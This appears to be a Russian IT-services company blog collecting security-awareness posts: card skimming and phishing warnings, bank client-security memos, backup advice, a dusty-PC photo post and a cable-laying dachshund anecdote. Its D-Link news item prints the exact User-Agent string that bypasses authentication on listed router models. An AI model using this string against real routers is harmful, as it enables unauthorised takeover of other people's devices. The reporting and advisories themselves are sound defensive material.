2. Кардинг. Здесь идут в ход специальные устройства и сложные технические средства. Сначала мошенники получают информацию с карты, а потом выпускают ее дубликат. Такая карта называется белым пластиком, на ней нет никаких видимых данных. Все зашифровано внутри. Хищение денег происходит посредством приобретения товара через интернет или путем обналичивания средств. Чтобы совершить покупку в интернете, нужен 16-значный номер карты, срок ее действия, имя владельца и трехзначный CVV-код, указанный на обратной стороне.

 

Есть несколько разновидностей кардинга:

 

Первая — установка специальных скимминговых устройств на банкомат. Варианты  скимминга: подделка панели для ввода PIN-кода, накладка на кардридер, которая считывает информацию с магнитной полосы, и мини-камера.


Вторая  — создание сайтов-дублеров, которые от оригинала отличает только тире, поставленное не в том месте, или точка в середине названия. Покупатель даже не подозревает, что сайт фальшивый, и оставляет мошенникам данные своей карты. Это так называемый фишинг, при помощи которого «ловят рыбу» мошенники.

 

Не только скимминговые устройства и фишинговые сайты могут предоставить преступникам данные вашей карты. Иногда информация передается недобросовестными работниками кафе, ресторанов, баров, автозаправочных станций. В таких местах вам предлагают не непродолжительное время отдать карту в чужие руки и она остается без присмотра.

 

Лучше всегда держать карту при себе. В ресторане или кафе можно самому  лично расплатиться. На это не требуется много времени, зато удовольствие от вечера не будет испорчено.

 

3. Мошеннические операции при помощи услуги «Мобильный банк». Преступники пользуются вашим бывшим телефонным номером, которым вы уже не пользуетесь, но на который была подключена услуга «Мобильный банк» и проводились операции с банковской картой. Чтобы такого не происходило, нужно непременно сообщать в банк о смене номера телефона, чтобы услугу отключили от старого номера и перевели на новый.

 

Для того чтобы постоянно быть в курсе состояния счета на вашей пластиковой карте, подключайте услугу SMS-информирования. Практически всегда потерпевшие даже не подозревают, что с их счета сняли деньги. Поэтому банк и правоохранительные органы слишком поздно узнают о случившемся, когда приостановить несанкционированную транзакцию уже невозможно.

Комментариев: 0

Вт

15

окт

2013

В роутерах D-Link найден «черный ход», оставленный производителем

Целый ряд моделей роутеров одного из крупнейших производителей сетевого оборудования D-Link содержит бэкдор в прошивке, который позволяет злоумышленникам дистанционно изменять настройки устройства, сообщает Computerworld. Проблема касается следующих моделей: D-Link DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+, TM-G5240 и, вероятно, DIR-615. Та же самая прошивка устанавливается в устройства BRL-04UR и BRL-04CW, выпускаемые компанией Planex.

 

Бэкдор был обнаружен специалистом по информационной безопасности Крэйгом Хеффнером (Craig Heffner) из компании Tactical Network Solutions, с помощью специального поискового движка Shodan, позволяющего находить любые подключенные к интернету устройства - от камер видеонаблюдения до роутеров и холодильников. Как рассказал эксперт в своем блоге, к роутерам можно получить доступ через веб-интерфейс, если при соединении к переменной User_Agent присвоить значение «xmlset_roodkcableoj28840ybtide». Злоумышленник сможет увидеть и изменить все настройки роутера. При этом логин и пароль вводить не потребуется.

 

Специалист нашел единственное упоминание данного выражения в Сети - размещенное в 2010 г. на одном из русскоязычных форумов. Что интересно, если написать вторую часть выражения в обратном порядке, получится словосочетание «edit by 04882 joel backdoor». Таким образом, в выражении явно говорится о бэкдоре - лазейке, позволяющей получать скрытый доступ к устройству. По всей видимости, данный бэкдор был добавлен в прошивку умышленно, однако вряд ли в шпионских целях, считает Хеффнер.


По мнению Хеффнера, данная лазейка была создана разработчиками прошивки для того, чтобы некоторые программы и процессы могли получать доступ к роутерам для автоматического изменения настроек, даже в том случае, если пользователь изменит стандартные имя и пароль.

В D-Link заявили, что в конце октября 2013 г. планируют выпустить обновление, в котором бэкдора не будет. Производитель не пояснил, был ли бэкдор помещен в прошивку намеренно и для каких целей. В компании добавили, что пользователи могут повысить защиту своих сетей, установив пароль на Wi-Fi и отключив удаленный доступ к роутеру.

 

Производители сетевого оборудования регулярно обновляют прошивки для повышения безопасности. Например, на прошлой неделе уязвимости в собственных сетевых продуктах устранила компания Cisco Systems, хотя это оборудование, в отличие от роутеров D-Link, предназначено для корпоративного сегмента. В случае с Cisco проблема затрагивала программное обеспечение Adaptive Security Appliance и коммутаторы серий Cisco Catalyst 6500 и Cisco 7600. Уязвимость в этих продуктах также позволяла обходить аутентификацию.

Комментариев: 0

Ср

03

апр

2013

Грязь в компьютерах: до чего может дойти без профилактики

Компьютеры нуждаются в уходе. Это относится не только к регулярному обновлению антивируса, своевременной установке исправлений для операционной системы и просто упорядочиванию многих гигабайтов информации. "Наводить лоск" необходимо в буквальном смысле, очищая ПК от пыли и грязи. И если в случае поверхностей забота об их чистоте продиктована эстетическими соображениями и снижением риска для собственного здоровья, то запылённое "железо" – это проблема "здоровья" самого компьютера, ведь при определённых условиях (состав пыли, влажность воздуха…) образующийся со временем на электронных платах слой мелких частиц может вызвать короткие замыкания, а снижение эффективности кулера с забитым пылью радиатором сказывается на стабильности работы системы. Тем не менее, многие владельцы ПК не утруждают себя их регулярной уборкой, а в отдельных случаях системные блоки выполняют функцию пылесборников годами. Мы отобрали из нескольких снимков, самые впечатляющие.

Это фотография обратной стороны передней панели системного блока, принадлежащего одному из наших клиентов.

А вот ещё один экземпляр! Кстати… Этот компьютер в рабочем состоянии. Сдуть такое количество пыли, конечно, не получится!

"Заснеженные" платы, запечатлённые нашим инженером, на удивление отлично справлялись со своими задачами.

Свидетелем такого отношения к серверу стал ещё один наш инженер, отметивший, что "производственный корпус с насыщенным частицами древесной и пластиковой пыли воздухом – не лучший выбор для размещения компьютерного оборудования". С момента установки прошло немногим более полугода.

А вот сделали снимок дисковода для 3,5" дискет, который всё реже можно встретить в компьютерах, со снятой передней панелью системного блока. Первые устройства этого форм-фактора появились в начале 1980-х годов. Возможно, этот экземпляр был среди них и с тех пор не видел тряпки.

Вот с чем приходится регулярно сталкиваться нашим сотрудникам, работающим в сфере ИТ аутсорсинга. Плата расширения (вероятно, звуковая карта) выглядит словно обросший микроорганизмами давно затонувший предмет. Интересно, видел ли наш клиент когда либо, такую грязь и во что обходится владельцу собственное здоровье?

Комментариев: 0

Вт

24

июл

2012

Таинственный кабелеукладчик

Однажды мне было необходимо срочно проложить четыре десятка проводов витой пары на расстояние в сто метров. Большая часть дистанции проходила над навесным потолком, на трёхметровой высоте. Поняв, что для моих единственных в конторе админских плеч, решение задачи в приемлемые сроки является непосильным, я принялся терзать шефа на предмет привлечения сторонних монтажников, и тот, скрепя сердце, согласился.

 

Я разработал техническое задание, разослал по разным конторам и стал ждать. Одно из предложений сильно выделялось из общей массы. Ребята утверждали, что работу они выполнят всего за один день, причём втрое дешевле, чем любой из конкурентов! На всякий случай перезвонил и уточнил, правильно ли они поняли задание. Ответили, что поняли прекрасно, а скорость и дешевизна объясняется тем, что в работе используется кабелеукладчик.

 

Я был заинтригован — с кабелеукладчиками имел дело в армии и решительно не представлял, каким образом данный девайс можно приспособить к прокладке витой пары под фальшпотолком. В назначенный день прибыли всего два монтажника со стремянками и инструментами. Наблюдая за процессом разгрузки, я с нетерпением ждал чудо-агрегата, способного автоматизировать процесс.

 

Агрегата так не дождался, зато последней из микроавтобуса была выгружена некрупная такса. Не успел я удивиться по поводу появления животного, как мне объяснили, что это и есть таинственный кабелеукладчик. В комплекте к таксе шел специальный костюмчик с ручкой вдоль спины для переноски, сбруя на голову со светодиодным фонариком и шлейка.

 

Прокладка кабеля осуществлялась путём прикрепления его к шлейке и запуска таксы в труднодоступное место. Надрессированное животное шустро мчалось на звук голоса или свет фонаря, волоча за собой провод. Потолок собаку выдерживал, мощности же хватало метров на пятьдесят. Скорость прокладки в длинных и труднодоступных участках была просто фантастической. Такса резво носилась в одну сторону по верху, а обратно — по коридору, пугая женскую часть персонала.

 

Даже ЧП в виде выпавшей панельки потолка не повлияло на её настроение: протягиваемый провод сыграл роль страховочного троса, и собачка плавно опустилась на пол. Ребята сказали, что к таким ситуациям кабелеукладчик приучен. Смех смехом, но такса на полном серьёзе стояла у ребят на балансе фирмы — мне были продемонстрированы документы.

 

Работу дружный коллектив действительно выполнил менее, чем за день, причем без предварительного разматывания кабеля и, соответственно, без обрезков. Правда, работа нашей конторы полностью встала — всё население сбежалось посмотреть за работой кабелеукладчика.

 

Это рассказ моего друга: Гайнанова Рафаэля

Комментариев: 0

Пн

15

авг

2011

Памятка о необходимости соблюдения правил безопасности при пользовании системой дистанционного обслуживания Банка (система «Клиент-Банк»)

Уважаемые клиенты! 

 

Напоминаем Вам о необходимости соблюдения правил безопасности при пользовании системой дистанционного обслуживания Банка (система «Клиент-Банк»).

 

  • Обязательно измените начальный пароль для входа в систему, полученный из Банка.
  • НИКАКОЙ банк! НИКОГДА не производит рассылок, уведомлений по электронной почте. Поэтому не отвечайте ни на какие письма с просьбой выслать логин и пароль, даже если они пришли из Банка, от техподдержки вашего провайдера и т.п. Никому не сообщайте свой пароль, в т.ч. и сотрудникам Банка – его не должен знать никто, кроме Вас.
  • Осуществляйте вход в Интернет-банк только с сайта www.ВАШБАНК.ru или сами введите адрес сайта http://www.ВАШБАНК.ru в адресной строке браузера. Никогда не открывайте сайт Интернет-банка по ссылкам (особенно баннерным или полученным через почту), поскольку существует множество способов фальсифицировать адрес.
  • Перед входом на сайт убедитесь, что у Вас запущена программа «Клиент-Банк».
  • Не храните файлы с секретной информацией о паролях на доступных носителях. Если у Вас возникли подозрения, что кто-либо узнал ваш пароль, Вам необходимо сменить пароль самостоятельно или заблокировать его, обратившись в Банк.
  • Не рекомендуется хранить файлы ключей ЭЦП на несъемных носителях (жесткие диски компьютера, общедоступные сетевые папки). Для хранения файлов ключей ЭЦП лучше использовать дискету или флэш-карту. Не оставляйте ключевые носители подключенными к компьютеру после завершения работы с системой, храните их в опечатываемом сейфе. При обоснованном подозрении на компрометацию ключей (кражу, копирование, доступ посторонних лиц к ключу ЭЦП, увольнение сотрудника, имевшего доступ к ключам, вирусное заражение), необходимо сменить пароль входа в систему и связаться с Банком для блокировки старых ключей и генерации новых.
  • При запросе окна браузера об использовании автозаполнения полей формы (логина и пароля) откажитесь от данной функции.
  • Если возможность автозаполнения личной информации в формах Вашего браузера уже активизирована, Вы можете отключить эту функцию вручную в настройках. Для этого в Internet Explorer Вам необходимо установить соответствующие параметры в меню «Сервис» (Tools) –> «Свойства обозревателя» (Internet Options) –> «Содержание» (Content) –> «Автозаполнение» (AutoComplete). (Внимание! После отключения автозаполнения все ранее сохраненные браузером логины и пароли придется вводить вручную!)
  • После окончания работы в системе Интернет-Банк обязательно завершите сессию с помощью кнопки «Выход», отключите от ПК ключевые носители и храните их в опечатываемом сейфе.
  • Используйте программное обеспечение из проверенных и надежных источников и выполняйте регулярные обновления.
  • Используйте современные антивирусные средства и своевременно их обновляйте. Регулярно проверяйте ПК на наличие вирусов. Обращаем внимание, что действие вирусов может быть направлено на запоминание и передачу третьим лицам информации о Вашем пароле и ключе.
  • Установите и используйте персональный брандмауэр (firewall) на Вашем компьютере для входа в Интернет, это позволит предотвратить несанкционированный доступ к информации на Вашем компьютере.
  • Необходимо периодически контролировать состояние счёта путем просмотра выписки.
  • Необходимо обращать внимание на дату и время последних входов в систему.
  • Внимание! До момента блокировки ключа ЭЦП Банк не несёт ответственности за платежи, совершённые с использованием этого ключа, даже в случае его компрометации.

 

Уважаемые клиенты, мы заботимся о сохранности ваших средств, поэтому просим соблюдать перечисленные выше меры безопасного пользования системы дистанционного обслуживания Банка.

 

Комментариев: 0

Вт

19

июл

2011

Резервное копирование данных

Добрый день!

 

Считаем необходимым обратить Ваше внимание на вновь участившиеся случаи заражения компьютеров вирусами - вымогателями платных SMS сообщений.

 

Экран компьютера оказывается, заблокирован и без удаления вируса продолжение работы на этом компьютере становится невозможно.

 

Мероприятия по лечению очень часто занимают неоправданно долгое время и не всегда дают положительный результат. И если даже в самом худшем случае данные чаще всего можно восстановить, то установленные программы и настройки приходится делать заново. А это может потребовать до нескольких дней работы в течении которых на компьютере невозможно будет нормально работать.

 

В связи с этим настоятельно рекомендуем оценить данные, для которых требуется обеспечить резервное копирование. А так же определить с какой частотой эту операцию следует проводить в Вашем случае.

 

Уровень вирусописателей постоянно растет, а разработчики антивирусного программного обеспечения все время в роли догоняющей стороны.

 

Поэтому единственная мера, которая может гарантировать сохранность Ваших данных - это резервное копирование!

 

Комментариев: 0

Вт

14

июн

2011

Информирмация о возможных случаях мошенничества в системах дистанционного банковского обслуживания

В связи с существенным расширением сегмента дистанционных банковских услуг, его привлекательность возросла не только для Клиентов, но и для криминальных структур. Это привело к качественному совершенствованию атакующего программного обеспечения (ПО). При этом, наиболее уязвимым звеном в электронном обмене “Клиент-Банк” является Клиент, злоумышленники практически полностью сместили вектор атаки на клиентское рабочее место.        

       Теоретически стали возможны случаи, когда на стороне Банка модифицированный злоумышленниками электронный платежный документ становится неотличим от документа, формируемого непосредственно Клиентом. Несмотря на предпринимаемые меры по защите банковской части систем дистанционного банковского обслуживания, максимальная защищенность платежей может быть достигнута только при непосредственном участии клиента и при выполнении клиентом рекомендаций банка по установке и настройке ПО.  

       Модификация платежного документа происходит путем полного или частичного (на уровне доступа к устройствам хранения закрытых ключей) контроля всех действий Клиента на его рабочем месте. При работе внедряемого злоумышленниками ПО используются уязвимости операционной системы, обслуживающей клиентское рабочее место.

         В связи с новыми обстоятельствами Вам необходимо:

1) с одной стороны, еще раз тщательным образом исследовать и оценить реальное состояние защищенности Вашего рабочего места,

2) с другой стороны – понять уровень важности конкретно Вашего участия в предотвращении подложных платежей (оперативное реагирование на предоставляемую Банком информацию о движениях по счету, обеспечение доступности ответственных сотрудников для оперативного взаимодействия с банком).

       К традиционным техническим мерам обеспечения информационной безопасности, изложенным в Соглашении об электронном обмене документами (штатная обновляемая операционная система, своевременное обновление антивирусного ПО, корректное хранение ключевых носителей), дополнительно рекомендуем соблюдать следующее:

-         Вынесение рабочего места дистанционного банковского обслуживания на отельный компьютер с минимумом задействованных сервисов;

-         Обеспечение любыми средствами загрузки из доверенной операционной среды (загрузка с неизменяемого флэш-накопителя, LiveCD, применение программного обеспечения, обеспечивающего доверенную операционную среду);

-         Минимизация времени работы данного рабочего места и времени пребывания съемного носителя в состоянии контакта со средой общего использования.

         Если всё же, несмотря на совместные усилия, злоумышленнику удалось провести незаконный платеж, помимо мер, предписанных в Соглашении об электронном обмене документами, Банк рекомендует:

       - при обнаружении признаков неправомерного платежа в присутствии свидетелей физически выключить, по возможности запаковать, опечатать компьютер и до момента обращения в правоохранительные органы ограничить доступ к нему. Только в этом случае независимая компьютерная криминалистическая экспертиза ПО Вашего компьютера может быть эффективна.

         - не предпринимать никаких действий по модификации состояния атакованного рабочего места на момент инцидента (переустановка системы дистанционного банковского обслуживания, частичная или полная переустановка операционной системы). Результаты компьютерной криминалистической экспертизы не только серьезно увеличивают шансы возврата незаконно списанных финансовых средств, но и позволят Вам корректно и без дополнительных финансовых потерь отчитаться перед налоговыми органами.

         Также обращаем внимание, что своевременное обращение в правоохранительные органы существенно увеличивает Ваши шансы по возврату утраченных средств. Банки оперативно и эффективно взаимодействует с правоохранительными органами по предоставлению всей необходимой информации о состоянии системы дистанционного банковского обслуживания на момент инцидента.

 

Комментариев: 0